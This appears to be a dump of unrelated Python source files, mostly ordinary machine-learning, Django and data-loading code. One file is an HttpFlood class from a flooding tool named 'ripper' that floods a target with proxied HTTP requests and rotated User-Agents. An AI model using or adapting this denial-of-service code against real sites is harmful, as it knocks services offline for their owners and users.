self.weight = nn.Parameter(torch.ones(in_nodes, dtype=torch.float32))
self.register_buffer("eps", torch.tensor(0.0001))
def forward(self, *x):
if len(x) != self.in_nodes:
raise RuntimeError(
"Expected to have {} input nodes, but have {}.".format(self.in_nodes, len(x))
)
# where wi ≥ 0 is ensured by applying a relu after each wi (paper)
weight = F.relu(self.weight)
weighted_xs = [xi * wi for xi, wi in zip(x, weight)]
normalized_weighted_x = sum(weighted_xs) / (weight.sum() + self.eps)
return normalized_weighted_x
class BiFPN(Backbone):
"""
This module implements Feature Pyramid Network.
It creates pyramid features built on top of some input feature maps.
"""
def __init__(self, bottom_up, out_channels, top_block=None):
super().__init__()
self.bottom_up = bottom_up
self.top_block = top_block
self.l5 = nn.Conv2d(bottom_up.feature_info[4]['num_chs'], out_channels, kernel_size=1)
self.l4 = nn.Conv2d(bottom_up.feature_info[3]['num_chs'], out_channels, kernel_size=1)
self.l3 = nn.Conv2d(bottom_up.feature_info[2]['num_chs'], out_channels, kernel_size=1)
self.l2 = nn.Conv2d(bottom_up.feature_info[1]['num_chs'], out_channels, kernel_size=1)
self.p4_tr = Conv3x3BnReLU(out_channels)
self.p3_tr = Conv3x3BnReLU(out_channels)
self.up = nn.Upsample(scale_factor=2, mode="nearest")
self.fuse_p4_tr = FastNormalizedFusion(in_nodes=2)
self.fuse_p3_tr = FastNormalizedFusion(in_nodes=2)
self.down_p2 = Conv3x3BnReLU(out_channels, stride=2)
self.down_p3 = Conv3x3BnReLU(out_channels, stride=2)
self.down_p4 = Conv3x3BnReLU(out_channels, stride=2)
self.fuse_p5_out = FastNormalizedFusion(in_nodes=2)
self.fuse_p4_out = FastNormalizedFusion(in_nodes=3)
self.fuse_p3_out = FastNormalizedFusion(in_nodes=3)
self.fuse_p2_out = FastNormalizedFusion(in_nodes=2)
self.p5_out = Conv3x3BnReLU(out_channels)
self.p4_out = Conv3x3BnReLU(out_channels)
self.p3_out = Conv3x3BnReLU(out_channels)
self.p2_out = Conv3x3BnReLU(out_channels)
self._out_features = ["p2", "p3", "p4", "p5", "p6"]
self._out_feature_channels = {k: out_channels for k in self._out_features}
self._size_divisibility = 32
self._out_feature_strides = {}
for k, name in enumerate(self._out_features):
self._out_feature_strides[name] = 2 ** (k + 2)
@property
def size_divisibility(self):
return self._size_divisibility
def forward(self, x):
p5, p4, p3, p2 = self.bottom_up(x) # top->down
_dummy = sum(x.view(-1)[0] for x in self.bottom_up.parameters()) * 0.0
p5 = p5 + _dummy
p5 = self.l5(p5)
p4 = self.l4(p4)
p3 = self.l3(p3)
p2 = self.l2(p2)
p4_tr = self.p4_tr(self.fuse_p4_tr(p4, self.up(p5)))
p3_tr = self.p3_tr(self.fuse_p3_tr(p3, self.up(p4_tr)))
p2_out = self.p2_out(self.fuse_p2_out(p2, self.up(p3_tr)))
p3_out = self.p3_out(self.fuse_p3_out(p3, p3_tr, self.down_p2(p2_out)))
p4_out = self.p4_out(self.fuse_p4_out(p4, p4_tr, self.down_p3(p3_out)))
p5_out = self.p5_out(self.fuse_p5_out(p5, self.down_p4(p4_out)))
return {"p2": p2_out, "p3": p3_out, "p4": p4_out, "p5": p5_out, "p6": self.top_block(p5_out)[0]}
def output_shape(self):
return {
name: ShapeSpec(
channels=self._out_feature_channels[name], stride=self._out_feature_strides[name]
)
for name in self._out_features
}
def test_script():
m = timm.create_model('spnasnet_100', pretrained=True, features_only=True, out_indices=(1, 2, 3, 4), )
x = torch.rand(1, 3, 224, 224)
m2 = BiFPN(m, 112)
torch.jit.trace(BiFPN(m, 10, 20), x)
if __name__ == "__main__":
m = timm.create_model('spnasnet_100', pretrained=True, features_only=True, out_indices=(1, 2, 3, 4), )
x = torch.rand(1, 3, 224, 224)
m2 = BiFPN(m, 112)
# for f in m2(x):
# print(f.size())
# torch.jit.trace(BiFPN(m, 10, 20), x)
# assert isinstance(m, Backbone)
|
500991
|
import re
from django.core.exceptions import ValidationError
def safe_character_validator(value):
unsafe_chars = re.compile(r'.*[<>\/\\;:&].*')
message = 'Enter only safe characters.'
if unsafe_chars.match(value):
raise ValidationError(message)
|
500994
|
from .metrics import *
from .classifier_metric import accuracy
from .sr_metric import *
from .segmentation_metric import *
|
501023
|
try:
from setuptools import setup
except:
from distutils.core import setup
setup(
name='t',
version='1.2.0',
author='<NAME>',
author_email='<EMAIL>',
url='https://hg.stevelosh.com/t',
py_modules=['t'],
entry_points={
'console_scripts': [
't = t:_main',
],
},
)
|
501035
|
import enum
from typing import Iterable, Optional
from lms.lmsdb.models import Notification, User
class NotificationKind(enum.Enum):
CHECKED = 1
FLAKE8_ERROR = 2
UNITTEST_ERROR = 3
USER_RESPONSE = 4
def get(user: User) -> Iterable[Notification]:
return Notification.fetch(user)
def read(user: Optional[User] = None, id_: Optional[int] = None) -> bool:
if id_:
try:
notification = Notification.get_by_id(id_)
except Notification.DoesNotExist:
return False
if user and (user.id != notification.user.id):
return False
notification.read()
return True
assert user, 'Must provide user or id_' # noqa: B101, S101
is_success = [msg.read() for msg in get(user)]
return all(is_success) # Not gen to prevent lazy evaluation
def read_related(related_id: int, user: int):
for n in Notification.of(related_id, user):
n.read()
def send(
user: User,
kind: NotificationKind,
message: str,
related_id: Optional[int] = None,
action_url: Optional[str] = None,
) -> Notification:
return Notification.send(
user, kind.value, message, related_id, action_url,
)
|
501041
|
import tensorflow as tf
import numpy as np
from . import base_model
class Qnetwork(base_model.BaseModel):
"""
Args:
name (string): label for model namespace
path (string): path to save/load model
input_shape (tuple): tuple of inputs to network.
output_shape (int): number of output nodes for network.
filter_sizes (tuple of ints): number of filters in each of the two hidden layers. Defaults to (512,512).
learning_rate (float): network's willingness to change current weights given new example
regularization (float): strength of weights regularization term in loss function
discount_factor (float): factor by which future reward after next action is taken are discounted
tau (float): Hyperparameter used in updating target network (if used)
Some notable values:
tau = 1.e-3 -> used in original paper
tau = 0.5 -> average DDQN
tau = 1.0 -> copy online -> target
A Q-network class which is responsible for holding and updating the weights and biases used in predicing Q-values for a given state. This Q-network will consist of
the following layers:
1) Input- a DraftState state s (an array of bool) representing the current state reshaped into an [n_batch, *input_shape] tensor.
2) Two layers of relu-activated hidden fc layers with dropout
3) Output- linearly activated estimations for Q-values Q(s,a) for each of the output_shape actions a available.
"""
@property
def name(self):
return self._name
@property
def discount_factor(self):
return self._discount_factor
def __init__(self, name, path, input_shape, output_shape, filter_sizes=(512,512), learning_rate=1.e-5, regularization_coeff=1.e-4, discount_factor=0.9, tau=1.0):
super().__init__(name=name, path=path)
self._input_shape = input_shape
self._output_shape = output_shape
self._filter_sizes = filter_sizes
self._learning_rate = learning_rate
self._regularization_coeff = regularization_coeff
self._discount_factor = discount_factor
self._n_hidden_layers = len(filter_sizes)
self._n_layers = self._n_hidden_layers + 2
self._tau = tau
self.online_name = "online"
self.target_name = "target"
# Build base Q-network model
self.online_ops = self.build_model(name = self.online_name)
# If using a target network for DDQN network, add related ops to model
if(self.target_name):
self.target_ops = self.build_model(name = self.target_name)
self.target_ops["target_init"] = self.create_target_initialization_ops(self.target_name, self.online_name)
self.target_ops["target_update"] = self.create_target_update_ops(self.target_name, self.online_name, tau=self._tau)
with self._graph.as_default():
self.online_ops["init"] = tf.global_variables_initializer()
self.init_saver()
def init_saver(self):
with self._graph.as_default():
self.saver = tf.train.Saver()
def save(self, path):
self.saver.save(self.sess, save_path=path)
def load(self, path):
self.saver.restore(self.sess, save_path=path)
def build_model(self, name):
ops_dict = {}
with self._graph.as_default():
with tf.variable_scope(name):
ops_dict["learning_rate"] = tf.Variable(self._learning_rate, trainable=False, name="learning_rate")
# Incoming state matrices are of size input_size = (nChampions, nPos+2)
# 'None' here means the input tensor will flex with the number of training
# examples (aka batch size).
ops_dict["input"] = tf.placeholder(tf.float32, (None,)+self._input_shape, name="inputs")
ops_dict["dropout_keep_prob"] = tf.placeholder_with_default(1.0,shape=())
# Fully connected (FC) layers:
fc0 = tf.layers.dense(
ops_dict["input"],
self._filter_sizes[0],
activation=tf.nn.relu,
bias_initializer=tf.constant_initializer(0.1),
name="fc_0")
dropout0 = tf.nn.dropout(fc0, ops_dict["dropout_keep_prob"])
fc1 = tf.layers.dense(
dropout0,
self._filter_sizes[1],
activation=tf.nn.relu,
bias_initializer=tf.constant_initializer(0.1),
name="fc_1")
dropout1 = tf.nn.dropout(fc1, ops_dict["dropout_keep_prob"])
# FC output layer
ops_dict["outQ"] = tf.layers.dense(
dropout1,
self._output_shape,
activation=None,
bias_initializer=tf.constant_initializer(0.1),
kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=self._regularization_coeff),
name="q_vals")
# Placeholder for valid actions filter
ops_dict["valid_actions"] = tf.placeholder(tf.bool, shape=ops_dict["outQ"].shape, name="valid_actions")
# Filtered Q-values
ops_dict["valid_outQ"] = tf.where(ops_dict["valid_actions"], ops_dict["outQ"], tf.scalar_mul(-np.inf,tf.ones_like(ops_dict["outQ"])), name="valid_q_vals")
# Max Q value amongst valid actions
ops_dict["max_Q"] = tf.reduce_max(ops_dict["valid_outQ"], axis=1, name="max_Q")
# Predicted optimal action amongst valid actions
ops_dict["prediction"] = tf.argmax(ops_dict["valid_outQ"], axis=1, name="prediction")
# Loss function and optimization:
# The inputs self.target and self.actions are indexed by training example. If
# s[i] = starting state for ith training example (recall that input state s is described by a vector so this will be a matrix)
# a*[i] = action taken from state s[i] during this training sample
# Q*(s[i],a*[i]) = the actual value observed from taking action a*[i] from state s[i]
# outQ[i,-] = estimated values for all actions from state s[i]
# Then we can write the inputs as
# self.target[i] = Q*(s[i],a*[i])
# self.actions[i] = a*[i]
ops_dict["target"] = tf.placeholder(tf.float32, shape=[None], name="target_Q")
ops_dict["actions"] = tf.placeholder(tf.int32, shape=[None], name="submitted_action")
# Since the Qnet outputs a vector Q(s,-) of predicted values for every possible action that can be taken from state s,
# we need to connect each target value with the appropriate predicted Q(s,a*) = Qout[i,a*[i]].
# Main idea is to get indexes into the outQ tensor based on input actions and gather the resulting Q values
# For some reason this isn't easy for tensorflow to do. So we must manually form the list of
# [i, actions[i]] index pairs for outQ..
# n_batch = outQ.shape[0] = actions.shape[0]
# n_actions = outQ.shape[1]
ind = tf.stack([tf.range(tf.shape(ops_dict["actions"])[0]),ops_dict["actions"]],axis=1)
# and then "gather" them.
estimatedQ = tf.gather_nd(ops_dict["outQ"], ind)
# Special notes: this is more efficient than indexing into the flattened version of outQ (which I have seen before)
# because the gather operation is applied to outQ directly. Apparently this propagates the gradient more efficiently
# under specific sparsity conditions (which tf.Variables like outQ satisfy)
# Simple sum-of-squares loss (error) function. Note that biases do not
# need to be regularized since they are (generally) not subject to overfitting.
ops_dict["loss"] = tf.reduce_mean(0.5*tf.square(ops_dict["target"]-estimatedQ), name="loss")
ops_dict["trainer"] = tf.train.AdamOptimizer(learning_rate = ops_dict["learning_rate"])
ops_dict["update"] = ops_dict["trainer"].minimize(ops_dict["loss"], name="update")
return ops_dict
def create_target_update_ops(self, target_scope, online_scope, tau=1e-3, name="target_update"):
"""
Adds operations to graph which are used to update the target network after after a training batch is sent
through the online network.
This function should be executed only once before training begins. The resulting operations should
be run within a tf.Session() once per training batch.
In double-Q network learning, the online (primary) network is updated using traditional backpropegation techniques
with target values produced by the target-Q network.
To improve stability, the target-Q is updated using a linear combination of its current weights
with the current weights of the online network:
Q_target = tau*Q_online + (1-tau)*Q_target
Typical tau values are small (tau ~ 1e-3). For more, see https://arxiv.org/abs/1509.06461 and https://arxiv.org/pdf/1509.02971.pdf.
Args:
target_scope (str): name of scope that target network occupies
online_scope (str): name of scope that online network occupies
tau (float32): Hyperparameter for combining target-Q and online-Q networks
name (str): name of operation which updates the target network when run within a session
Returns: Tensorflow operation which updates the target nework when run.
"""
with self._graph.as_default():
target_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=target_scope)
online_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=online_scope)
ops = [target_params[i].assign(tf.add(tf.multiply(tau,online_params[i]),tf.multiply(1.-tau,target_params[i]))) for i in range(len(target_params))]
return tf.group(*ops,name=name)
def create_target_initialization_ops(self, target_scope, online_scope):
"""
This adds operations to the graph in order to initialize the target Q network to the same values as the
online network.
This function should be executed only once just after the online network has been initialized.
Args:
target_scope (str): name of scope that target network occupies
online_scope (str): name of scope that online network occupies
Returns:
Tensorflow operation (named "target_init") which initialize the target nework when run.
"""
return self.create_target_update_ops(target_scope, online_scope, tau=1.0, name="target_init")
|
501042
|
INITIAL_RPC_IF_ID = RPC_IF_ID
class _RPC_IF_ID(INITIAL_RPC_IF_ID):
def __repr__(self):
return '<RPC_IF_ID "{0}" ({1}, {2})>'.format(self.Uuid.to_string(), self.VersMajor, self.VersMinor)
|
501072
|
import torch
from model import resnet34
from PIL import Image
import matplotlib.pyplot as plt
import json
import os
import torch.utils.data as data
import numpy as np
import pandas as pd
from PIL import Image
import cv2
import logging
from torchvision import transforms, datasets
from torch.utils.data import DataLoader, RandomSampler, DistributedSampler, SequentialSampler
logger = logging.getLogger(__name__)
def simple_accuracy(preds, labels):
# print(preds)
# print(labels)
return (preds == labels).mean()
def load_weights(model, weight_path):
pretrained_weights = torch.load(weight_path)
model_weights = model.state_dict()
load_weights = {k: v for k, v in pretrained_weights.items() if k in model_weights}
model_weights.update(load_weights)
model.load_state_dict(model_weights)
return model
def setup(args):
# Prepare model
config = CONFIGS[args.model_type]
# num_classes = if args.dataset == "cifar10" else 100
num_classes = args.num_classes
model = VisionTransformer(config, args.img_size, zero_head=True, num_classes=num_classes)
# model.load_from(np.load(args.pretrained_dir))
model = load_weights(model, args.pretrained_dir)
model.to(args.device)
num_params = count_parameters(model)
logger.info("{}".format(config))
logger.info("Training parameters %s", args)
logger.info("Total Parameter: \t%2.1fM" % num_params)
print(num_params)
return args, model
def count_parameters(model):
params = sum(p.numel() for p in model.parameters() if p.requires_grad)
return params/1000000
class XRAY(data.Dataset):
train_data = "train_data.txt"
val_data = "val_data.txt"
test_data = "test_data.txt"
train_label = "train_label.npy"
val_label = "val_label.npy"
test_label = "test_label.npy"
def __init__(self, root, split="train", transform=None):
super(XRAY, self)
self.split = split
self.root = root
self.transform = transform
self.data = []# 装图片路径
# self.targets = [] # 装图片标签
if self.split == "train":
# 训练集的路径
downloaded_data_txt = self.train_data
downloaded_label_txt= self.train_label
elif self.split == "val":
downloaded_data_txt = self.val_data
downloaded_label_txt= self.val_label
elif self.split == "test":
downloaded_data_txt = self.test_data
downloaded_label_txt= self.test_label
with open(os.path.join(self.root,downloaded_data_txt),"r",encoding="utf-8") as fr:
data_list = fr.readlines()
for i in range(len(data_list)):
if data_list[i][-1] == '\n':
self.data.append(data_list[i][:-1])
else :
self.data.append(data_list[i])
self.targets = np.load(os.path.join(root,downloaded_label_txt))
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img_path, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.open(img_path).convert("RGB")
if self.transform is not None:
img = self.transform(img)
return img, target
def get_test_loader():
transform_test = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
trainset = XRAY(root = "./DataProcessed/VinBigData_Chest_X-ray/", split="train", transform= transform_train)
testset = XRAY(root = "./DataProcessed/VinBigData_Chest_X-ray/", split="val", transform= transform_test)
test_sampler = SequentialSampler(testset)
test_loader = DataLoader(testset,
sampler=test_sampler,
batch_size=64,
num_workers=4,
pin_memory=True) if testset is not None else None
return test_loader
def valid(args, model, test_loader):
# Validation!
eval_losses = AverageMeter()
logger.info("***** Running Validation *****")
logger.info(" Num steps = %d", len(test_loader))
logger.info(" Batch size = %d", args.eval_batch_size)
model.eval()
all_preds, all_label = [], []
epoch_iterator = tqdm(test_loader,
desc="Validating... (loss=X.X)",
bar_format="{l_bar}{r_bar}",
dynamic_ncols=True,
disable=args.local_rank not in [-1, 0])
# loss_fct = torch.nn.CrossEntropyLoss()
loss_fct = torch.nn.BCEWithLogitsLoss()
sigmoid = torch.nn.Sigmoid()
for step, batch in enumerate(epoch_iterator):
# if step > 10: # debug code
# break
batch = tuple(t.to(args.device) for t in batch)
x, y = batch
with torch.no_grad():
logits = model(x)[0]
eval_loss = loss_fct(logits, y.float())
eval_losses.update(eval_loss.item())
# preds = torch.argmax(logits, dim=-1)
preds = (logits.sigmoid() > 0.5) * 1
if len(all_preds) == 0:
all_preds.append(preds.detach().cpu().numpy())
all_label.append(y.detach().cpu().numpy())
else:
all_preds[0] = np.append(
all_preds[0], preds.detach().cpu().numpy(), axis=0
)
all_label[0] = np.append(
all_label[0], y.detach().cpu().numpy(), axis=0
)
epoch_iterator.set_description("Validating... (loss=%2.5f)" % eval_losses.val)
all_preds, all_label = all_preds[0], all_label[0]
accuracy = simple_accuracy(all_preds, all_label)
logger.info("\n")
logger.info("Validation Results")
logger.info("Valid Loss: %2.5f" % eval_losses.avg)
logger.info("Valid Accuracy: %2.5f" % accuracy)
return accuracy, eval_losses.avg
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--name", required=True,
help="Name of this run. Used for monitoring.")
parser.add_argument("--dataset", choices=["cifar10", "cifar100"], default="cifar10",
help="Which downstream task.")
parser.add_argument("--num_classes",default = 15,type=int,help="the number of class")
parser.add_argument("--model_type", choices=["ViT-B_16", "ViT-B_32", "ViT-L_16",
"ViT-L_32", "ViT-H_14", "R50-ViT-B_16"],
default="ViT-B_16",
help="Which variant to use.")
parser.add_argument("--pretrained_dir", type=str, default="checkpoint/ViT-B_16.npz",
help="Where to search for pretrained ViT models.")
parser.add_argument("--output_dir", default="output", type=str,
help="The output directory where checkpoints will be written.")
parser.add_argument("--img_size", default=224, type=int,
help="Resolution size")
parser.add_argument("--train_batch_size", default=512, type=int,
help="Total batch size for training.")
parser.add_argument("--eval_batch_size", default=64, type=int,
help="Total batch size for eval.")
parser.add_argument("--eval_every", default=100, type=int,
help="Run prediction on validation set every so many steps."
"Will always run one evaluation at the end of training.")
parser.add_argument("--learning_rate", default=3e-2, type=float,
help="The initial learning rate for SGD.")
parser.add_argument("--weight_decay", default=0, type=float,
help="Weight deay if we apply some.")
parser.add_argument("--num_steps", default=10000, type=int,
help="Total number of training epochs to perform.")
parser.add_argument("--decay_type", choices=["cosine", "linear"], default="cosine",
help="How to decay the learning rate.")
parser.add_argument("--warmup_steps", default=500, type=int,
help="Step of training to perform learning rate warmup for.")
parser.add_argument("--max_grad_norm", default=1.0, type=float,
help="Max gradient norm.")
parser.add_argument("--local_rank", type=int, default=-1,
help="local_rank for distributed training on gpus")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16', action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--fp16_opt_level', type=str, default='O2',
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html")
parser.add_argument('--loss_scale', type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = '7, 8'
# Setup CUDA, GPU & distributed training
if args.local_rank == -1:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
args.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend='nccl',
timeout=timedelta(minutes=60))
args.n_gpu = 1
args.device = device
# Setup logging
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN)
logger.warning("Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s" %
(args.local_rank, args.device, args.n_gpu, bool(args.local_rank != -1), args.fp16))
# Set seed
set_seed(args)
# Model & Tokenizer Setup
args, model = setup(args)
# Testing
dataloaders = get_test_loader()
valid(args, model, dataloaders)
if __name__ == "__main__":
main()
|
501107
|
import sys
import os
import bz2
import pandas as pd
import numpy as np
import MySQLdb
from collections import defaultdict
file_path = os.path.dirname(os.path.realpath(__file__))
growth_lib_path = os.path.abspath(os.path.join(file_path, "..", "common"))
sys.path.insert(0, growth_lib_path)
''' Connect to DB '''
db = MySQLdb.connect(host=os.environ["DATAVIVA_DB_HOST"], user=os.environ[
"DATAVIVA_DB_USER"], passwd=os.environ["DATAVIVA_DB_PW"], db=os.environ["DATAVIVA_DB_NAME"])
cursor = db.cursor()
missing = {
"bra_id": defaultdict(int),
"university_id": defaultdict(int),
"course_hedu_id": defaultdict(int)
}
cursor.execute("select id_ibge, id from attrs_bra where id_ibge is not null and length(id) = 9;")
bra_lookup = {str(r[0]): r[1] for r in cursor.fetchall()}
cursor.execute("select id from attrs_university;")
university_lookup = {str(r[0]): str(r[0]) for r in cursor.fetchall()}
cursor.execute("select id from attrs_course_hedu;")
course_lookup = {str(r[0]): str(r[0]) for r in cursor.fetchall()}
def map_gender(x):
MALE, FEMALE = 0, 1
gender_dict = {MALE: 'A', FEMALE: 'B'}
try:
return str(gender_dict[int(x)])
except:
print x
sys.exit()
def map_color(color):
WHITE = 1
BLACK = 2
MULTI = 3
ASIAN = 4
INDIAN = 5
UNIDENTIFIED = 6
color_dict = {UNIDENTIFIED: 'H', INDIAN: 'C', WHITE: 'D',
BLACK: 'E', ASIAN: 'F', MULTI: 'G', 9: 'H', -1: 'H', 0: 'H'}
try:
return str(color_dict[int(color)])
except Exception, e:
raise Exception("Unknown color: error %s" % e)
def map_loc(loc):
URBAN, RURAL = 1, 2
loc_dict = {URBAN: 'N', RURAL: 'O'}
try:
return str(loc_dict[int(loc)])
except:
print loc
sys.exit()
def map_school_type(st):
FEDERAL, STATE, LOCAL, PROFIT_PRIVATE, NONPROFIT_PRIVATE, SPECIAL, SPECIAL_2015 = 1, 2, 3, 4, 5, 6, 7
loc_dict = {FEDERAL: 'P', STATE: 'Q', LOCAL: 'R', PROFIT_PRIVATE: 'S',
NONPROFIT_PRIVATE: 'T', SPECIAL: 'U', SPECIAL_2015: 'U'}
try:
return str(loc_dict[int(st)])
except:
print st
sys.exit()
def floatvert(x):
x = x.replace(',', '.')
try:
return float(x)
except:
return np.nan
def bra_replace(raw):
try:
return bra_lookup[str(raw).strip()]
except:
missing["bra_id"][raw] += 1
return "0xx000007"
def university_replace(raw):
try:
return university_lookup[str(raw).strip().zfill(5)]
except:
missing["university_id"][raw] += 1
return None
def course_replace(raw):
try:
return course_lookup[str(raw)]
except:
missing["course_hedu_id"][raw] += 1
return "000000"
def to_df(file_path, year, indexes=None):
if "bz2" in file_path:
input_file = bz2.BZ2File(file_path)
else:
input_file = open(file_path, "rU")
if indexes:
converters = {"course_hedu_id": str, "university_id": str}
df = pd.read_csv(input_file, sep="\t", converters=converters, engine='python')
df = df.set_index(indexes)
else:
cols = ["university_id", "school_type", "academic_organization", "course_id_bad",
"degree", "modality", "level", "student_id", "enrolled", "graduates", "entrants",
"Year_entry", "gender", "age", "ethnicity", "bra_id", "course_hedu_id", "course_name",
"morning", "afternoon", "night", "full_time", "year"]
delim = ";"
coerce_cols = {"bra_id": bra_replace, "university_id": university_replace,
"course_hedu_id": course_replace, "ethnicity": map_color, "gender": map_gender,
"school_type": map_school_type}
df = pd.read_csv(input_file, header=0, sep=delim, names=cols, converters=coerce_cols)
df = df.drop(
["course_name", "modality", "Year_entry", "degree", "course_id_bad", "academic_organization", "level"],
axis=1
)
df = df[df["year"] == int(year)]
for col, missings in missing.items():
if not len(missings):
continue
num_rows = df.shape[0]
print
print "[WARNING]"
print "The following {0} IDs are not in the DB. Total: ".format(col, num_rows)
print list(missings)
return df
|
501207
|
import random
import re
from contextlib import suppress
from socket import socket
from socks import ProxyError
from ripper.constants import HTTP_STATUS_CODE_CHECK_PERIOD_SEC
from ripper.context.events_journal import EventsJournal
from ripper.context.target import Target
from ripper.actions.attack_method import AttackMethod
from ripper.proxy import Proxy
HTTP_STATUS_PATTERN = re.compile(r" (\d{3}) ")
# Forward Reference
Context = 'Context'
events_journal = EventsJournal()
class HttpFlood(AttackMethod):
"""HTTP Flood method."""
name: str = 'HTTP Flood'
label: str = 'http-flood'
_target: Target
_ctx: Context
_proxy: Proxy = None
_http_connect: socket = None
def __init__(self, target: Target, context: Context):
self._target = target
self._ctx = context
def create_connection(self):
self._proxy = self._ctx.proxy_manager.get_random_proxy()
conn = self._ctx.sock_manager.create_tcp_socket(self._proxy)
return conn
def __call__(self, *args, **kwargs):
with suppress(Exception), self.create_connection() as self._http_connect:
self._http_connect.connect(self._target.hostip_port_tuple())
self._target.stats.connect.status_success()
events_journal.info('Creating HTTP connection...', target=self._target)
while self.send(self._http_connect):
if self._ctx.dry_run:
break
continue
self._ctx.target.stats.connect.status_failed()
# TODO remove from flood class, status name is not part of flood program
def _send_event_with_status(self, code: int):
base = 'Checked Response status...'
if code < 300:
events_journal.info(f'{base} {code}: Success', target=self._target)
elif 299 > code < 400:
events_journal.warn(f'{base} {code}: Redirection', target=self._target)
elif code == 400:
events_journal.warn(f'{base} {code}: Bad Request', target=self._target)
elif 400 > code <= 403:
events_journal.warn(f'{base} {code}: Forbidden', target=self._target)
elif code == 404:
events_journal.warn(f'{base} {code}: Not Found', target=self._target)
elif 404 > code < 408:
events_journal.warn(f'{base} {code}: Not Acceptable or Not Allowed', target=self._target)
elif code == 408:
events_journal.warn(f'{base} {code}: Request Timeout', target=self._target)
elif 408 > code < 429:
events_journal.error(f'{base} {code}: Client Error', target=self._target)
elif code == 429:
events_journal.error(f'{base} {code}: Too Many Requests', target=self._target)
elif 429 > code < 459:
events_journal.error(f'{base} {code}: Client Error', target=self._target)
elif 460 >= code <= 463:
events_journal.error(f'{base} {code}: AWS Load Balancer Error', target=self._target)
elif 499 > code <= 511:
events_journal.error(f'{base} {code}: Server Error', target=self._target)
elif 520 >= code <= 530:
events_journal.error(f'{base} {code}: CloudFlare Reverse Proxy Error', target=self._target)
else:
events_journal.error(f'{base} {code}: Custom Error', target=self._target)
def check_response_status(self, payload: bytes):
with suppress(Exception):
if self._ctx.time_interval_manager.check_timer_elapsed(HTTP_STATUS_CODE_CHECK_PERIOD_SEC):
check_sock = self.create_connection()
check_sock.connect(self._target.hostip_port_tuple())
check_sock.send(payload)
http_response = repr(check_sock.recv(32))
check_sock.close()
status = int(re.search(HTTP_STATUS_PATTERN, http_response)[1])
self._target.stats.http_stats[status] += 1
self._send_event_with_status(status)
def send(self, sock: socket) -> bool:
payload = self.payload().encode('utf-8')
try:
sent = sock.send(payload)
self.check_response_status(payload)
except ProxyError:
self._ctx.proxy_manager.delete_proxy_sync(self._proxy)
except Exception as e:
self._target.stats.connect.status_failed()
events_journal.exception(e, target=self._target)
else:
self._target.stats.packets.status_sent(sent)
self._proxy.report_success() if self._proxy is not None else 0
return True
return False
def headers(self, content: str = '') -> dict[str, str]:
"""Prepare headers."""
headers = self._ctx.headers_provider.headers
headers['Content-Length'] = str(len(content))
headers['User-Agent'] = random.choice(self._ctx.headers_provider.user_agents)
return headers
def payload(self, body: str = '') -> str:
"""Generate payload for Request."""
body_content = f'{body}\r\n\r\n' if body else '\r\n'
headers = '\r\n'.join([f'{key}: {value}' for (key, value) in self.headers(body).items()])
request = '{} {} HTTP/1.1\r\nHost: {}\r\n{}\r\n{}'.format(
self._target.http_method.upper(),
self._target.http_path,
self._target.host,
headers,
body_content
)
return request
|
501274
|
import os, glob
from conans import CMake, ConanFile, tools
class MdnsConan(ConanFile):
name = "mdns"
license = "Unlicense"
homepage = "https://github.com/mjansson/mdns"
url = "https://github.com/conan-io/conan-center-index"
description = "Public domain mDNS/DNS-SD library in C"
topics = ("conan", "mdns", "dns", "dns-sd")
settings = "os"
no_copy_source = True
@property
def _source_subfolder(self):
return "source_subfolder"
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = glob.glob('mdns-*/')[0]
os.rename(extracted_dir, self._source_subfolder)
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
self.copy(pattern="*.h", dst="include", src=self._source_subfolder)
def package_info(self):
if self.settings.os == "Windows":
self.cpp_info.system_libs = ["iphlpapi", "ws2_32"]
if str(self.settings.os) in ["Linux", "Android"]:
self.cpp_info.system_libs.append('pthread')
def package_id(self):
self.info.header_only()
|
501307
|
import re
from collections import OrderedDict
from datetime import timedelta
from logging import Handler, LogRecord
from pathlib import Path
from threading import Thread
from typing import Dict, Any, TYPE_CHECKING, List, Optional, Union, Type, Tuple
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from django.db.models import ForeignObject, Model
if TYPE_CHECKING:
# we need to do this, to avoid circular imports
from automated_logging.models import (
RequestEvent,
ModelEvent,
ModelValueModification,
ModelRelationshipModification,
)
class DatabaseHandler(Handler):
def __init__(
self, *args, batch: Optional[int] = 1, threading: bool = False, **kwargs
):
self.limit = batch or 1
self.threading = threading
self.instances = OrderedDict()
super(DatabaseHandler, self).__init__(*args, **kwargs)
@staticmethod
def _clear(config):
from automated_logging.models import ModelEvent, RequestEvent, UnspecifiedEvent
from django.db import transaction
current = timezone.now()
with transaction.atomic():
if config.model.max_age:
ModelEvent.objects.filter(
created_at__lte=current - config.model.max_age
).delete()
if config.unspecified.max_age:
UnspecifiedEvent.objects.filter(
